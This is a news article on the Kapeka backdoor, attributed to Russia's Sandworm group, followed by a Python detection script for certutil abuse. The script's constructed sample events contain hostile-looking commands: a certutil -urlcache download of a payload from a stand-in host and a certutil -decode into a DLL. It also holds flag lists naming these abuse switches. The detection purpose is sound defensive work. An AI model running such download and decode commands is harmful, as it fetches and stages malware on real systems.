Kapeka: the new cyber threat from Russia
Discovering and analyzing a new global cybersecurity challenge
The Kapeka backdoor, identified by WithSecure, is a threat to Windows systems and is linked to the Sandworm group. It disguises itself as a Word add-in and receives and executes commands from a remote command-and-control server.
Recently discovered by the Finnish company WithSecure, the Kapeka backdoor, which Microsoft tracks as KnuckleTouch, targets Windows operating systems. This cyber threat, attributed to the Russian-affiliated Sandworm APT group, has been used mainly in Eastern Europe, with attacks recorded in Estonia and Ukraine since mid-2022. Kapeka is notable for its versatility: it can serve both as an early-stage tool in a cyber-attack and as a means of persistent remote access to victims' assets.
Technical details and use of Kapeka in cyber attacks
The Kapeka backdoor is implemented as a Windows DLL written in C++, with fully featured command and control (C2) functionality. The module poses as an add-in for Microsoft Word to avoid detection and runs its C2 command handling on multiple threads. Its capabilities include reading and writing files, executing shell commands, and managing itself through updates or autonomous uninstallation, which improves its stealth and makes it useful both for cyber espionage and for ransomware distribution.
Relationships between Kapeka and other malware families
WithSecure highlighted links between Kapeka and other well-known malware families such as GreyEnergy and BlackEnergy, indicating a possible evolution within Sandworm's toolset. Furthermore, overlaps in attack techniques were observed that link Kapeka to recent ransomware campaigns, such as the Prestige campaign. These associations suggest that Sandworm's arsenal is continually evolving, with existing tools being refined or new ones developed to increase the effectiveness of attacks.
Tips for protecting against the Kapeka threat
Microsoft has observed the use of "living-off-the-land" techniques, such as using the built-in certutil utility to download the dropper from compromised websites, which underlines the importance of a proactive cybersecurity strategy. It is essential to keep systems updated and to review code and configurations regularly. Promoting security awareness within organizations is crucial to mitigating the risk of infection by malware like Kapeka and to protecting sensitive data and critical infrastructure.
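The certutil download technique mentioned above leaves a clear trace in process-creation telemetry, so it is one of the cheaper things to hunt for. The following detection example is added here and is not code from the article, from WithSecure or from Microsoft; the log events it scans are constructed, and the event field names (`ts`, `host`, `image`, `cmdline`) are an assumed schema rather than any particular EDR's format. The `-urlcache` and `-decode` options are real certutil switches commonly abused for downloading and for decoding staged payloads.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events (not from the article): a benign
# certutil use, a download-style invocation, a decode invocation, and an
# unrelated process. Field names are an assumed schema.
SAMPLE_EVENTS = [
    {"ts": "2024-04-23T10:01:02", "host": "WS01",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -store My"},
    {"ts": "2024-04-23T10:05:44", "host": "WS01",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/update.bin "
                r"C:\Users\Public\update.bin"},
    {"ts": "2024-04-23T10:06:10", "host": "WS02",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\payload.txt C:\Users\Public\payload.dll"},
    {"ts": "2024-04-23T10:07:00", "host": "WS02",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# certutil switches that have no business appearing on a typical workstation:
# -urlcache fetches a URL into the local cache, -decode turns a base64 text
# file back into a binary. Both "-" and "/" prefixes are accepted by certutil.
DOWNLOAD_FLAGS = {"-urlcache", "/urlcache"}
DECODE_FLAGS = {"-decode", "/decode", "-decodehex", "/decodehex"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    ts: str
    host: str
    reason: str
    cmdline: str


def classify_certutil(cmdline: str) -> Optional[str]:
    """Return a human-readable reason if the certutil command line looks like
    download or payload-staging activity, otherwise None."""
    tokens = cmdline.lower().split()
    if not tokens or "certutil" not in tokens[0]:
        return None
    flags = {t for t in tokens if t.startswith(("-", "/"))}
    if flags & DOWNLOAD_FLAGS or URL_RE.search(cmdline):
        return "certutil used to fetch a remote URL (download cradle)"
    if flags & DECODE_FLAGS:
        return "certutil used to decode a file (possible payload staging)"
    return None


def scan_events(events) -> List[Finding]:
    """Scan process-creation events and return findings for suspicious certutil use."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("certutil.exe"):
            continue
        reason = classify_certutil(ev["cmdline"])
        if reason:
            findings.append(Finding(ev["ts"], ev["host"], reason, ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host}: {f.reason}\n    {f.cmdline}")
```

Matching on the image path rather than only the first command-line token catches renamed copies that are still launched via the real binary path, while the URL regex catches invocations that use a switch not in the list. In a real deployment the same logic maps directly onto a SIEM query over Sysmon Event ID 1 or equivalent EDR process-start events, and hits should be triaged against the parent process and the user context.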
04/23/2024 18:26
Marco Verro